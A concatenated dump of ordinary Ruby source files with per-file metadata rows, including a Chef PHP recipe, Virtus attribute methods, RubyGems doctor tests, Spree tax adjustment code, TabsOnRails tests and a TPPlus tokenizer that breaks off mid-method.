| 21 | 99 | 0.739496 |
d5fe07b1fc2c76bb2cae36f733dc731558f5089f | 69 | class CommunityRecommendationsController < ApplicationController
end
| 23 | 64 | 0.913043 |
f87ddd908e05c81c16a0f5c032dfcf0278f97db2 | 509 | # @todo Hack until https://github.com/opscode-cookbooks/php/pull/111 is
# included.
node.override['php']['ext_conf_dir'] = "/etc/php5/mods-available"
include_recipe 'php'
include_recipe "apache2::mod_php5"
pkgs = [
"php5-gd",
"php5-mysql",
"php5-mcrypt",
"php5-curl",
"php5-dev"
]
pkgs.each do |pkg|
package pkg do
action :install
end
end
template "/etc/php5/apache2/conf.d/vdd_php.ini" do
source "vdd_php.ini.erb"
mode "0644"
notifies :restart, "service[apache2]", :delayed
end
| 18.851852 | 71 | 0.685658 |
ffee7ce717fa6176dec95620197b0fdec1af41e3 | 4,777 | module Virtus
# Instance methods that are added when you include Virtus
module InstanceMethods
module Constructor
# Set attributes during initialization of an object
#
# @param [#to_hash] attributes
# the attributes hash to be set
#
# @return [undefined]
#
# @api private
def initialize(attributes = nil)
self.class.attribute_set.set(self, attributes) if attributes
set_default_attributes
end
end # Constructor
module MassAssignment
# Returns a hash of all publicly accessible attributes
#
# @example
# class User
# include Virtus
#
# attribute :name, String
# attribute :age, Integer
# end
#
# user = User.new(:name => 'John', :age => 28)
# user.attributes # => { :name => 'John', :age => 28 }
#
# @return [Hash]
#
# @api public
def attributes
attribute_set.get(self)
end
alias_method :to_hash, :attributes
# Mass-assign attribute values
#
# Keys in the +attributes+ param can be symbols or strings.
# All referenced Attribute writer methods *will* be called.
# Non-attribute setter methods on the receiver *will* be called.
#
# @example
# class User
# include Virtus
#
# attribute :name, String
# attribute :age, Integer
# end
#
# user = User.new
# user.attributes = { :name => 'John', 'age' => 28 }
#
# @param [#to_hash] attributes
# a hash of attribute names and values to set on the receiver
#
# @return [Hash]
#
# @api public
def attributes=(attributes)
attribute_set.set(self, attributes)
end
end # MassAssignment
# Returns a value of the attribute with the given name
#
# @example
# class User
# include Virtus
#
# attribute :name, String
# end
#
# user = User.new(:name => 'John')
# user[:name] # => "John"
#
# @param [Symbol] name
# a name of an attribute
#
# @return [Object]
# a value of an attribute
#
# @api public
def [](name)
public_send(name)
end
# Sets a value of the attribute with the given name
#
# @example
# class User
# include Virtus
#
# attribute :name, String
# end
#
# user = User.new
# user[:name] = "John" # => "John"
# user.name # => "John"
#
# @param [Symbol] name
# a name of an attribute
#
# @param [Object] value
# a value to be set
#
# @return [Object]
# the value set on an object
#
# @api public
def []=(name, value)
public_send("#{name}=", value)
end
# Freeze object
#
# @return [self]
#
# @api public
#
# @example
#
# class User
# include Virtus
#
# attribute :name, String
# attribute :age, Integer
# end
#
# user = User.new(:name => 'John', :age => 28)
# user.frozen? # => false
# user.freeze
# user.frozen? # => true
#
# @api public
def freeze
set_default_attributes!
super
end
# Reset an attribute to its default
#
# @return [self]
#
# @api public
#
# @example
#
# class User
# include Virtus
#
# attribute :age, Integer, default: 21
# end
#
# user = User.new(:name => 'John', :age => 28)
# user.age = 30
# user.age # => 30
# user.reset_attribute(:age)
# user.age # => 21
#
# @api public
def reset_attribute(attribute_name)
attribute = attribute_set[attribute_name]
attribute.set_default_value(self) if attribute
self
end
# Set default attributes
#
# @return [self]
#
# @api private
def set_default_attributes
attribute_set.set_defaults(self)
self
end
# Set default attributes even lazy ones
#
# @return [self]
#
# @api public
def set_default_attributes!
attribute_set.set_defaults(self, proc { |_| false })
self
end
private
# The list of allowed public methods
#
# @return [Array<String>]
#
# @api private
def allowed_methods
public_methods.map(&:to_s)
end
# @api private
def assert_valid_name(name)
if respond_to?(:attributes) && name.to_sym == :attributes || name.to_sym == :attribute_set
raise ArgumentError, "#{name.inspect} is not allowed as an attribute name"
end
end
end # module InstanceMethods
end # module Virtus
| 21.912844 | 96 | 0.538623 |
5d717a3a72d8b08b7478f5843d39ad2fe703a722 | 934 | cask 'flash-ppapi' do
version '28.0.0.137'
sha256 '46ed55fe6e464cdb2de97244cec77a26234ecb6c8de2e9a8d41a1e81e55ac5c6'
url "https://fpdownload.adobe.com/pub/flashplayer/pdc/#{version}/install_flash_player_osx_ppapi.dmg"
appcast 'http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_en_mac_pep.xml',
checkpoint: '0e62296da997de154e620ca99f77fd9842641dbaf5970a8dc41dc927fedcc2cc'
name 'Adobe Flash Player PPAPI (plugin for Opera and Chromium)'
homepage 'https://get.adobe.com/flashplayer/otherversions/'
auto_updates true
pkg 'Install Adobe Pepper Flash Player.app/Contents/Resources/Adobe Flash Player.pkg'
uninstall pkgutil: 'com.adobe.pkg.PepperFlashPlayer',
delete: '/Library/Internet Plug-Ins/PepperFlashPlayer'
zap trash: [
'~/Library/Caches/Adobe/Flash Player',
'~/Library/Logs/FlashPlayerInstallManager.log',
]
end
| 40.608696 | 104 | 0.745182 |
388b3985631279752cf3d5022018be07d967f52a | 1,348 | require_relative '../spec_helper'
describe "Skatelog" do
describe "inheritance" do
it "inherits from ActiveRecord::Base" do
expect(Skatelog < ActiveRecord::Base).to be true
end
end
describe "associations" do
before(:all) do
Skatelog.destroy_all
user = User.create(name:"Dramass", username:"Dramass", boardtype: "indo", password:"123")
Skatelog.create(title: "Berkeley Skate Park Sesh", seshtime: "1 hour", tricks: "none", description: "Skating and hanging with patches", user_id: user.id)
drama = User.find_by(username: "Dramass")
Skatelog.delete_all
Skatelog.create( {:title => "Berkeley Skate Park Sesh",
:seshtime => "1 hour",
:tricks => "none",
:description => "Skating and hanging with patches",
:user_id => drama.id } )
end
describe "belongs to user" do
describe "#user" do
it "returns the skatelog's user" do
skatelog = Skatelog.first
expected_user = User.find(skatelog.user_id)
expect(skatelog.user).to eq expected_user
end
it "returns a User object" do
skatelog = Skatelog.first
expect(skatelog.user).to be_instance_of User
end
end
end
end
end
| 24.962963 | 159 | 0.590504 |
1cef52234e8dd96f6ad099e36aace378ac13dab8 | 4,055 | # frozen_string_literal: true
require 'rubygems/test_case'
require 'rubygems/doctor'
class TestGemDoctor < Gem::TestCase
def gem(name)
spec = quick_gem name do |gem|
gem.files = %W[lib/#{name}.rb Rakefile]
end
write_file File.join(*%W[gems #{spec.full_name} lib #{name}.rb])
write_file File.join(*%W[gems #{spec.full_name} Rakefile])
spec
end
def test_doctor
a = gem 'a'
b = gem 'b'
c = gem 'c'
Gem.use_paths @userhome, @gemhome
FileUtils.rm b.spec_file
File.open c.spec_file, 'w' do |io|
io.write 'this will raise an exception when evaluated.'
end
assert_path_exists File.join(a.gem_dir, 'Rakefile')
assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')
assert_path_exists b.gem_dir
refute_path_exists b.spec_file
assert_path_exists c.gem_dir
assert_path_exists c.spec_file
doctor = Gem::Doctor.new @gemhome
capture_io do
use_ui @ui do
doctor.doctor
end
end
assert_path_exists File.join(a.gem_dir, 'Rakefile')
assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')
refute_path_exists b.gem_dir
refute_path_exists b.spec_file
refute_path_exists c.gem_dir
refute_path_exists c.spec_file
expected = <<-OUTPUT
Checking #{@gemhome}
Removed file specifications/c-2.gemspec
Removed directory gems/b-2
Removed directory gems/c-2
OUTPUT
assert_equal expected, @ui.output
assert_equal Gem.dir, @userhome
assert_equal Gem.path, [@gemhome, @userhome]
end
def test_doctor_dry_run
a = gem 'a'
b = gem 'b'
c = gem 'c'
Gem.use_paths @userhome, @gemhome
FileUtils.rm b.spec_file
File.open c.spec_file, 'w' do |io|
io.write 'this will raise an exception when evaluated.'
end
assert_path_exists File.join(a.gem_dir, 'Rakefile')
assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')
assert_path_exists b.gem_dir
refute_path_exists b.spec_file
assert_path_exists c.gem_dir
assert_path_exists c.spec_file
doctor = Gem::Doctor.new @gemhome, true
capture_io do
use_ui @ui do
doctor.doctor
end
end
assert_path_exists File.join(a.gem_dir, 'Rakefile')
assert_path_exists File.join(a.gem_dir, 'lib', 'a.rb')
assert_path_exists b.gem_dir
refute_path_exists b.spec_file
assert_path_exists c.gem_dir
assert_path_exists c.spec_file
expected = <<-OUTPUT
Checking #{@gemhome}
Extra file specifications/c-2.gemspec
Extra directory gems/b-2
Extra directory gems/c-2
OUTPUT
assert_equal expected, @ui.output
assert_equal Gem.dir, @userhome
assert_equal Gem.path, [@gemhome, @userhome]
end
def test_doctor_non_gem_home
other_dir = File.join @tempdir, 'other', 'dir'
FileUtils.mkdir_p other_dir
doctor = Gem::Doctor.new @tempdir
capture_io do
use_ui @ui do
doctor.doctor
end
end
assert_path_exists other_dir
expected = <<-OUTPUT
Checking #{@tempdir}
This directory does not appear to be a RubyGems repository, skipping
OUTPUT
assert_equal expected, @ui.output
end
def test_doctor_child_missing
doctor = Gem::Doctor.new @gemhome
doctor.doctor_child 'missing', ''
assert true # count
end
def test_doctor_badly_named_plugins
gem 'a'
Gem.use_paths @gemhome.to_s
FileUtils.mkdir_p Gem.plugindir
bad_plugin = File.join(Gem.plugindir, "a_badly_named_file.rb")
write_file bad_plugin
doctor = Gem::Doctor.new @gemhome
capture_io do
use_ui @ui do
doctor.doctor
end
end
# refute_path_exists bad_plugin
expected = <<-OUTPUT
Checking #{@gemhome}
Removed file plugins/a_badly_named_file.rb
OUTPUT
assert_equal expected, @ui.output
end
def test_gem_repository_eh
doctor = Gem::Doctor.new @gemhome
refute doctor.gem_repository?, 'no gems installed'
install_specs util_spec 'a'
doctor = Gem::Doctor.new @gemhome
assert doctor.gem_repository?, 'gems installed'
end
end
| 20.794872 | 68 | 0.687793 |
21ead02bbd859b0449099f1fbecfab542c71db8d | 763 | # frozen_string_literal: true
module Facter
# Filter inside value of a fact.
# e.g. os.release.major is the user query, os.release is the fact
# and major is the filter criteria inside tha fact
class FactFilter
def filter_facts!(searched_facts)
filter_legacy_facts!(searched_facts)
searched_facts.each do |fact|
fact.value = if fact.filter_tokens.any? && fact.value.respond_to?(:dig)
fact.value.dig(*fact.filter_tokens)
else
fact.value
end
end
end
private
def filter_legacy_facts!(resolved_facts)
return if Options[:show_legacy]
resolved_facts.reject!(&:legacy?) unless Options[:user_query]
end
end
end
| 27.25 | 79 | 0.630406 |
ed78ed46cae719b4799b5c5fecd9022aa540019e | 3,370 | # standard libraries
require "bundler"
require "digest"
require "fileutils"
require "forwardable"
require "json"
require "open3"
require "pathname"
require "set"
require "strscan"
require "tempfile"
require "time"
require "tmpdir"
require "uri"
require "yaml"
require "erb"
# 3rd-party libraries
require "aws-sdk-s3"
require "bugsnag"
require "git_diff_parser"
require "jsonseq"
require "nokogiri"
require "retryable"
require "strong_json"
require "parallel"
# application
require "runners/version"
require "runners/exitstatus"
require "runners/errors"
require "runners/tmpdir"
require "runners/config"
require "runners/config_generator"
require "runners/options"
require "runners/sensitive_filter"
require "runners/git_blame_info"
require "runners/location"
require "runners/results"
require "runners/issue"
require "runners/harness"
require "runners/analyzer"
require "runners/analyzers"
require "runners/io"
require "runners/io/aws_s3"
require "runners/trace_writer"
require "runners/changes"
require "runners/workspace"
require "runners/workspace/git"
require "runners/shell"
require "runners/command"
require "runners/warnings"
require "runners/ruby"
require "runners/ruby/gem_installer"
require "runners/ruby/gem_installer/spec"
require "runners/ruby/gem_installer/source"
require "runners/ruby/lockfile_loader"
require "runners/ruby/lockfile_loader/lockfile"
require "runners/ruby/lockfile_parser"
require "runners/rubocop_utils"
require "runners/nodejs"
require "runners/java"
require "runners/kotlin"
require "runners/php"
require "runners/python"
require "runners/swift"
require "runners/go"
require "runners/cplusplus"
require "runners/recommended_config"
require "runners/schema/options"
require "runners/schema/trace"
require "runners/schema/config"
require "runners/schema/result"
# processors
require "runners/processor"
require "runners/processor/actionlint"
require "runners/processor/brakeman"
require "runners/processor/checkstyle"
require "runners/processor/clang_tidy"
require "runners/processor/code_sniffer"
require "runners/processor/coffeelint"
require "runners/processor/cppcheck"
require "runners/processor/cpplint"
require "runners/processor/detekt"
require "runners/processor/eslint"
require "runners/processor/flake8"
require "runners/processor/fxcop"
require "runners/processor/golangci_lint"
require "runners/processor/goodcheck"
require "runners/processor/hadolint"
require "runners/processor/haml_lint"
require "runners/processor/javasee"
require "runners/processor/jshint"
require "runners/processor/ktlint"
require "runners/processor/languagetool"
require "runners/processor/metrics_codeclone"
require "runners/processor/metrics_complexity"
require "runners/processor/metrics_fileinfo"
require "runners/processor/misspell"
require "runners/processor/phinder"
require "runners/processor/phpmd"
require "runners/processor/pmd_cpd"
require "runners/processor/pmd_java"
require "runners/processor/pylint"
require "runners/processor/querly"
require "runners/processor/reek"
require "runners/processor/remark_lint"
require "runners/processor/rubocop"
require "runners/processor/scss_lint"
require "runners/processor/secret_scan"
require "runners/processor/shellcheck"
require "runners/processor/slim_lint"
require "runners/processor/stylelint"
require "runners/processor/swiftlint"
require "runners/processor/tyscan"
module Runners
end
| 28.083333 | 47 | 0.821662 |
acb8631a33480ab590befbfe06eb7e92b0cef5a3 | 2,343 | # The MIT License (MIT)
# Copyright (c) 2018 Mike DeAngelo Looker Data Sciences, Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
RSpec.describe "`gzr attribute` command", type: :cli do
it "executes `gzr help attribute` command successfully" do
output = `gzr help attribute`
expected_output = <<-OUT
Commands:
gzr attribute cat ATTR_ID|ATTR_NAME # Output json information about an attribute to screen or file
gzr attribute create ATTR_NAME [ATTR_LABEL] [OPTIONS] # Create or modify an attribute
gzr attribute get_group_value GROUP_ID|GROUP_NAME ATTR_ID|ATTR_NAME # Retrieve a user attribute value for a group
gzr attribute help [COMMAND] # Describe subcommands or one specific subcommand
gzr attribute import FILE # Import a user attribute from a file
gzr attribute ls # List all the defined user attributes
gzr attribute rm ATTR_ID|ATTR_NAME # Delete a user attribute
gzr attribute set_group_value GROUP_ID|GROUP_NAME ATTR_ID|ATTR_NAME VALUE # Set a user attribute value for a group
OUT
expect(output).to eq(expected_output)
end
end
| 57.146341 | 139 | 0.691848 |
39febdec5e17b28c924dfcbb081bfa3b1f160583 | 727 | require 'spec_helper'
RSpec.describe Onesignal do
describe '.configure' do
before { Onesignal.configure }
it 'creates a new instance of Configuration' do
expect(Onesignal.configuration).to be_a(Configuration)
end
context 'when configuration exists' do
it 'does not create a new instance' do
configuration = Onesignal.configuration
Onesignal.configure
expect(Onesignal.configuration).to eq(configuration)
end
end
context 'when configuration block is given' do
let(:logger) { 'test' }
it 'yields the configuration object' do
expect { |config| Onesignal.configure(&config) }.to yield_with_args(Configuration)
end
end
end
end
| 25.964286 | 90 | 0.686382 |
1d0ddf44db4c1b638d0e5c7e76dc112f5a4490c7 | 173 | # frozen_string_literal: true
class AddReadAuditsToRole < ActiveRecord::Migration[4.2]
def change
add_column :roles, :read_audits, :boolean, default: false
end
end
| 21.625 | 61 | 0.763006 |
79ae35ad5615ec56c7157930c3f8c84ac107eebb | 2,858 | # frozen_string_literal: true
module Spree
# Relatively simple class used to apply a {Spree::Tax::OrderTax} to a
# {Spree::Order}.
#
# This class will create or update adjustments on the taxed items and remove
# any now inapplicable tax adjustments from the order.
class OrderTaxation
# Create a new order taxation.
#
# @param [Spree::Order] order the order to apply taxes to
# @return [Spree::OrderTaxation] a {Spree::OrderTaxation} object
def initialize(order)
@order = order
end
# Apply taxes to the order.
#
# This method will create or update adjustments on all line items and
# shipments in the order to reflect the appropriate taxes passed in. It
# will also remove any now inapplicable tax adjustments.
#
# @param [Spree::Tax::OrderTax] taxes the taxes to apply to the order
# @return [void]
def apply(taxes)
@order.line_items.each do |item|
taxed_items = taxes.line_item_taxes.select { |element| element.item_id == item.id }
update_adjustments(item, taxed_items)
end
@order.shipments.each do |item|
taxed_items = taxes.shipment_taxes.select { |element| element.item_id == item.id }
update_adjustments(item, taxed_items)
end
end
private
# Walk through the taxes for an item and update adjustments for it. Once
# all of the taxes have been added as adjustments, remove any old tax
# adjustments that weren't touched.
#
# @private
# @param [#adjustments] item a {Spree::LineItem} or {Spree::Shipment}
# @param [Array<Spree::Tax::ItemTax>] taxed_items a list of calculated taxes for an item
# @return [void]
def update_adjustments(item, taxed_items)
tax_adjustments = item.adjustments.select(&:tax?)
active_adjustments = taxed_items.map do |tax_item|
update_adjustment(item, tax_item)
end
# Remove any tax adjustments tied to rates which no longer match.
unmatched_adjustments = tax_adjustments - active_adjustments
item.adjustments.destroy(unmatched_adjustments)
end
# Update or create a new tax adjustment on an item.
#
# @private
# @param [#adjustments] item a {Spree::LineItem} or {Spree::Shipment}
# @param [Spree::Tax::ItemTax] tax_item calculated taxes for an item
# @return [Spree::Adjustment] the created or updated tax adjustment
def update_adjustment(item, tax_item)
tax_adjustment = item.adjustments.detect do |adjustment|
adjustment.source == tax_item.tax_rate
end
tax_adjustment ||= item.adjustments.new(
source: tax_item.tax_rate,
order_id: item.order_id,
label: tax_item.label,
included: tax_item.included_in_price
)
tax_adjustment.update!(amount: tax_item.amount)
tax_adjustment
end
end
end
| 34.853659 | 92 | 0.683345 |
5dae558b6e02719aafa659b57e4900d1bbc0ee71 | 8,666 | require 'test_helper'
class MixinTestController < ActionController::Base
end
class MixinTest < ActionController::TestCase
tests MixinTestController
def test_set_tab
controller.set_tab :footab
assert_equal(:footab, controller.tab_stack[:default])
end
def test_set_tab_with_namespace
controller.set_tab :footab, :namespace
assert_equal(:footab, controller.tab_stack[:namespace])
end
def test_set_tab_with_default_namespace
controller.set_tab :footab, :default
assert_equal(:footab, controller.tab_stack[:default])
end
def test_set_tab_with_and_without_namespace
controller.set_tab :firsttab
controller.set_tab :secondtab, :custom
assert_equal(:firsttab, controller.tab_stack[:default])
assert_equal(:secondtab, controller.tab_stack[:custom])
end
def test_current_tab
controller.tab_stack[:default] = :mytab
assert_equal(:mytab, controller.current_tab)
end
def test_current_tab_with_namespace
controller.tab_stack[:namespace] = :mytab
assert_equal(:mytab, controller.current_tab(:namespace))
end
def test_current_tab_with_default_namespace
controller.tab_stack[:default] = :mytab
assert_equal(:mytab, controller.current_tab(:default))
end
def test_set_tab_with_and_without_namespace
controller.tab_stack[:default] = :firsttab
controller.tab_stack[:custom] = :secondtab
assert_equal(:firsttab, controller.current_tab(:default))
assert_equal(:secondtab, controller.current_tab(:custom))
end
def test_current_tab_question
controller.tab_stack[:default] = :mytab
assert( controller.current_tab?(:mytab))
assert(!controller.current_tab?(:yourtab))
end
def test_current_tab_question_with_namespace
controller.tab_stack[:custom] = :mytab
assert( controller.current_tab?(:mytab, :custom))
assert(!controller.current_tab?(:yourtab, :custom))
end
def test_current_tab_question_with_default_namespace
controller.tab_stack[:default] = :mytab
assert( controller.current_tab?(:mytab, :default))
assert(!controller.current_tab?(:yourtab, :default))
end
def test_current_tab_question_with_and_without_namespace
controller.tab_stack[:default] = :firsttab
controller.tab_stack[:custom] = :secondtab
assert( controller.current_tab?(:firsttab, :default))
assert(!controller.current_tab?(:secondtab, :default))
assert( controller.current_tab?(:secondtab, :custom))
assert(!controller.current_tab?(:firsttab, :custom))
end
end
class WorkingMixinTestController < ActionController::Base
def self.controller_name; "working"; end
def self.controller_path; "working"; end
layout false
set_tab :dashboard
set_tab :welcome, :only => %w( action_welcome )
set_tab :dashboard, :only => %w( action_namespace )
set_tab :homepage, :namespace, :only => %w( action_namespace )
def action_dashboard
execute("action_dashboard")
end
def action_namespace
execute("action_namespace")
end
def action_welcome
execute("action_welcome")
end
private
def execute(method)
if method.to_s =~ /^action_(.*)/
render :action => (params[:template] || 'default')
end
end
class BlockBuilder < TabsOnRails::Tabs::TabsBuilder
def tab_for(tab, name, options, item_options = {}, &block)
item_options[:class] = item_options[:class].to_s.split(" ").push("current").join(" ") if current_tab?(tab)
content = @context.link_to_unless(current_tab?(tab), name, options) do
@context.content_tag(:span, name)
end
content += @context.capture(&block) if block_given?
@context.content_tag(:li, content, item_options)
end
end
end
class WorkingMixinTest < ActionController::TestCase
tests WorkingMixinTestController
def test_render_default
get :action_dashboard
assert_dom_equal(%Q{<ul>
<li class="current"><span>Dashboard</span></li>
<li><a href="/w">Welcome</a></li>
</ul>}, @response.body)
end
def test_render_with_open_close_tabs
get :action_dashboard, :template => "with_open_close_tabs"
assert_dom_equal(%Q{<ul id="tabs">
<li class="current"><span>Dashboard</span></li>
<li><a href="/w">Welcome</a></li>
</ul>}, @response.body)
end
def test_render_with_item_options
get :action_dashboard, :template => "with_item_options"
assert_dom_equal(%Q{<ul id="tabs">
<li class="custom current"><span>Dashboard</span></li>
<li class="custom"><a href="/w">Welcome</a></li>
</ul>}, @response.body)
end
def test_render_with_item_block
get :action_dashboard, :template => "with_item_block"
assert_dom_equal(%Q{<ul>
<li class="custom current"><span>Dashboard</span></li>
<li class="custom"><a href="/w">Welcome</a>
<img src="#image" />
</li></ul>}, @response.body)
end
def test_render_with_option_active_class
get :action_dashboard, :template => "with_option_active_class"
assert_dom_equal(%Q{<ul id="tabs">
<li class="active"><span>Dashboard</span></li>
<li><a href="/w">Welcome</a></li>
</ul>}, @response.body)
end
def test_set_tab
get :action_dashboard
assert_equal(:dashboard, controller.current_tab)
assert_equal(:dashboard, controller.current_tab(:default))
assert_dom_equal(%Q{<ul>
<li class="current"><span>Dashboard</span></li>
<li><a href="/w">Welcome</a></li>
</ul>}, @response.body)
end
def test_set_tab_with_only_option
get :action_welcome
assert_equal :welcome, controller.current_tab
assert_equal :welcome, controller.current_tab(:default)
assert_dom_equal(%Q{<ul>
<li><a href="/d">Dashboard</a></li>
<li class="current"><span>Welcome</span></li>
</ul>}, @response.body)
end
def test_set_tab_with_namespace
get :action_namespace
assert_equal :dashboard, controller.current_tab
assert_equal :dashboard, controller.current_tab(:default)
assert_equal :homepage, controller.current_tab(:namespace)
assert_dom_equal(%Q{<ul>
<li class="current"><span>Dashboard</span></li>
<li><a href="/w">Welcome</a></li>
</ul>}, @response.body)
end
def test_current_tab
get :action_dashboard
assert_equal :dashboard, controller.current_tab
assert_equal :dashboard, controller.current_tab(:default)
end
def test_current_tab_question
get :action_dashboard
assert controller.current_tab?(:dashboard)
assert controller.current_tab?(:dashboard, :default)
assert !controller.current_tab?(:foobar)
assert !controller.current_tab?(:foobar, :default)
end
end
class ControllerMixinHelpersTest < ActionView::TestCase
tests TabsOnRails::ActionController::HelperMethods
include ActionView::Helpers::TagHelper
include ActionView::Helpers::UrlHelper
MockBuilder = Class.new(TabsOnRails::Tabs::Builder) do
def initialize_with_mocha(*args)
checkpoint
initialize_without_mocha(*args)
end
alias_method_chain :initialize, :mocha
def checkpoint
end
def tab_for(tab, name, *args)
end
end
NilBoundariesBuilder = Class.new(TabsOnRails::Tabs::Builder) do
def tab_for(tab, name, *args)
@context.content_tag(:span, name)
end
end
NilOpenBoundaryBuilder = Class.new(NilBoundariesBuilder) do
def close_tabs(options = {})
'<br />'
end
end
NilCloseBoundaryBuilder = Class.new(NilBoundariesBuilder) do
def open_tabs(options = {})
'<br />'
end
end
def test_tabs_tag_should_raise_local_jump_error_without_block
assert_raise(LocalJumpError) { tabs_tag }
end
def test_tabs_tag_with_builder
MockBuilder.any_instance.expects(:checkpoint).once
tabs_tag(:builder => MockBuilder) { "" }
end
def test_tabs_tag_with_namespace
MockBuilder.any_instance.expects(:checkpoint).once
tabs_tag(:builder => MockBuilder, :namespace => :custom) do |tabs|
builder = tabs.instance_variable_get(:'@builder')
assert_equal(:custom, builder.instance_variable_get(:'@namespace'))
""
end
end
def test_tabs_tag_should_not_concat_open_close_tabs_when_nil
content = tabs_tag(:builder => NilBoundariesBuilder) do |t|
concat t.single('Single', '#')
end
assert_dom_equal '<span>Single</span>', content
end
def test_tabs_tag_should_not_concat_open_tabs_when_nil
content = tabs_tag(:builder => NilOpenBoundaryBuilder) do |t|
concat t.single('Single', '#')
end
assert_dom_equal '<span>Single</span><br />', content
end
def test_tabs_tag_should_not_concat_close_tabs_when_nil
content = tabs_tag(:builder => NilCloseBoundaryBuilder) do |t|
concat t.single('Single', '#')
end
assert_dom_equal '<br /><span>Single</span>', content
end
end
| 28.228013 | 112 | 0.718671 |
795a21d96cd2e360bd86d6a2d4a22286ffaab4f3 | 1,543 | class TagsInput < ActiveAdminAddons::InputBase
include ActiveAdminAddons::SelectHelpers
def render_custom_input
if active_record_select?
return render_collection_tags
end
render_array_tags
end
def load_control_attributes
load_data_attr(:model, value: model_name)
load_data_attr(:method, value: method)
load_data_attr(:width, default: "80%")
if active_record_select?
load_data_attr(:relation, value: true)
load_data_attr(:collection, value: collection_to_select_options, formatter: :to_json)
else
load_data_attr(:collection, value: array_to_select_options, formatter: :to_json)
end
end
private
def render_array_tags
render_tags_control { build_hidden_control(prefixed_method, method_to_input_name, input_value.is_a?(Array) ? input_value.join(',') : input_value) }
end
def render_collection_tags
render_tags_control { render_selected_hidden_items }
end
def render_tags_control(&block)
concat(label_html)
concat(block.call)
concat(builder.select(build_virtual_attr, [], {}, input_html_options))
end
def render_selected_hidden_items
template.content_tag(:div, id: selected_values_id) do
template.concat(build_hidden_control(empty_input_id, method_to_input_array_name, ""))
input_value.each do |item_id|
template.concat(
build_hidden_control(
method_to_input_id(item_id),
method_to_input_array_name,
item_id.to_s
)
)
end
end
end
end
| 27.553571 | 151 | 0.723914 |
4a4c20b3db6902d999a05966fa32c1bf38fe4ae4 | 416 | require 'simplecov'
cov_root = File.expand_path('..', File.dirname(__FILE__))
SimpleCov.start do
#add_group('debug') { |src| print src.filename+"\n"; false }
add_group('src') { |src|
src.filename.start_with? "#{cov_root}/src"
}
add_group('test/src') { |src|
src.filename.start_with? "#{cov_root}/test/src"
}
end
SimpleCov.root cov_root
SimpleCov.coverage_dir ENV['CYBER_DOJO_COVERAGE_ROOT'] | 26 | 62 | 0.689904 |
bf0b0d7f2cc26bce13a7c575a8601c0373904bba | 6,047 | module TPPlus
class Scanner
def initialize
end
attr_reader :lineno, :col
attr_reader :tok_line, :tok_col
def scan_setup(src)
@src = src
@lineno = 1
@ch = " "
@offset = 0
@col = 0
@rdOffset = 0
@prevDot = false # for groups
@tok_line = 0
@tok_col = 0
self.next
end
def next
if @rdOffset < @src.length
@offset = @rdOffset
@ch = @src[@rdOffset]
if @ch == "\n"
@lineno += 1
@col = 0
end
@rdOffset += 1
@col += 1
else
@offset = @src.length
@ch = -1
end
end
def isDigit?(ch)
return false if ch == -1
case ch
when '0','1','2','3','4','5','6','7','8','9'
return true
else
return false
end
end
def isLetter?(ch)
return false if ch == -1
case ch
when 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
'_'
return true
else
return false
end
end
def skipWhitespace
while @ch == ' ' || @ch == "\t" || @ch == "\r"
self.next
end
end
def scanIdentifier
offs = @offset
while isLetter?(@ch) || isDigit?(@ch)
self.next
end
# allow one ? or ! at end
if @ch == '?' || @ch == '!'
self.next
end
return @src[offs,(@offset-offs)]
end
def scanReal
offs = @offset-1
while self.isDigit?(@ch)
self.next
end
return [:REAL, @src[offs,(@offset-offs)].to_f]
end
def scanNumber
offs = @offset
while self.isDigit?(@ch)
self.next
end
if @ch == '.'
self.next
while self.isDigit?(@ch)
self.next
end
return [:REAL, @src[offs,(@offset-offs)].to_f]
else
return [:DIGIT, @src[offs,(@offset-offs)].to_i]
end
end
def scanComment
offs = @offset-1 # opening # already consumed
while @ch != "\n" && @ch != -1
self.next
end
return @src[offs,(@offset-offs)]
end
def scanString(type)
offs = @offset
while @ch != type && @ch != -1
self.next
end
# consume close
self.next
return @src[offs, (@offset-offs-1)] # -1 to remove trailing " or '
end
def scanLabel
offs = @offset
while self.isLetter?(@ch) || isDigit?(@ch)
self.next
end
return @src[offs, (@offset-offs)]
end
# return token
def next_token
self.skipWhitespace
@tok_line = @lineno
@tok_col = @col
tok = nil
lit = ""
ch = @ch
if isLetter?(ch)
lit = self.scanIdentifier
if @ch == '['
tok = TPPlus::Token.lookup_data(lit)
elsif lit == "DIV"
tok = :DIV
else
# keywords are longer than 1 char, avoid lookup otherwise
if lit.length > 1
if @prevDot
case lit
when "gp1","gp2","gp3","gp4","gp5"
tok = :GROUP
else
tok = TPPlus::Token.lookup(lit)
end
else
tok = TPPlus::Token.lookup(lit)
end
else
tok = :WORD
end
end
elsif isDigit?(ch)
tok, lit = self.scanNumber
else
self.next # always make progress
case ch
when -1
return nil
when '='
if @ch == '='
tok = :EEQUAL
self.next
else
tok = :EQUAL
end
when ':'
if @ch == "="
tok = :ASSIGN
self.next
else
tok = :COLON
end
when "<"
if @ch == "="
tok = :LTE
self.next
elsif @ch == ">"
tok = :NOTEQUAL
self.next
else
tok = :LT
end
when ">"
if @ch == "="
tok = :GTE
self.next
else
tok = :GT
end
when "+"
tok = :PLUS
when "-"
tok = :MINUS
when "*"
tok = :STAR
when "/"
tok = :SLASH
